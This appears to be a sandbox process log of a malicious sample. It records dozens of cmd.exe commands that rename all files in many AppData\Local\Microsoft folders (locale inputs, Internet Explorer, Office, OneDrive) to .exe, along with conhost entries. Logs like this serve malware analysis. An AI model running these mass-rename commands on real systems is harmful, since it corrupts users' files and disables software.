"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-ML\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-RE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-SN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\gl-ES\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ha-Latn-NG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\he-IL\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hi-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-BA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-HR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hu-HU\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hy-AM\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\id-ID\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-CH\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-IT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ka-GE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\kk-KZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lt-LT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lv-LV\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\mk-MK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-BN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-MY\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nb-NO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-BE\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-NL\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pl-PL\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-BR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-PT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-MD\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-RO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ru-RU\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sk-SK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sl-SI\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sq-AL\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-BA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-ME\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-RS\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-BA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-ME\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-RS\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-FI\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-SE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\tr-TR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uk-UA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uz-Latn-UZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\CacheStorage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieUserList\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\7p1qk7k\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\f3qjisv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C14C\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\5\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\arm64\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\imageformats\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nb-NO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\platforms\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ro\*.*" "*.exe"

